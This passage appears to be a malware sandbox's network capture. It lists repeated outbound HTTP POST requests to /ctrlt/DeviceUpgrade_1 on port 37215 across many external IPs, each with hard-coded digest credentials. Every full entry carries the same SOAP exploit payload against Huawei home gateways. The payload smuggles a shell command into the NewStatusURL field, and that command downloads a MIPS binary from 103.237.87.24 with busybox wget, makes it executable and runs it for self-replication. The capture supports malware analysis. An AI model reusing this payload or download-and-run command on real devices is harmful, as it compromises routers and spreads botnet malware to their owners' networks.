3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2267192.168.2.1355506197.105.150.9537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.604685068 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2268192.168.2.1357790197.187.0.7837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.604690075 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2269192.168.2.134738038.26.169.19337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.604712963 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2270192.168.2.135200241.56.77.11837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.604804039 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2271192.168.2.133334262.128.77.13637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.604814053 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2272192.168.2.1353312197.238.125.9237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.605704069 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2273192.168.2.1338970157.161.101.17637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.605743885 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2274192.168.2.1340202157.107.253.17937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.605757952 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2275192.168.2.135104217.131.190.4937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.605807066 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2276192.168.2.1339450197.156.157.23537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.605837107 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2277192.168.2.1360596197.203.225.937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.606137991 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
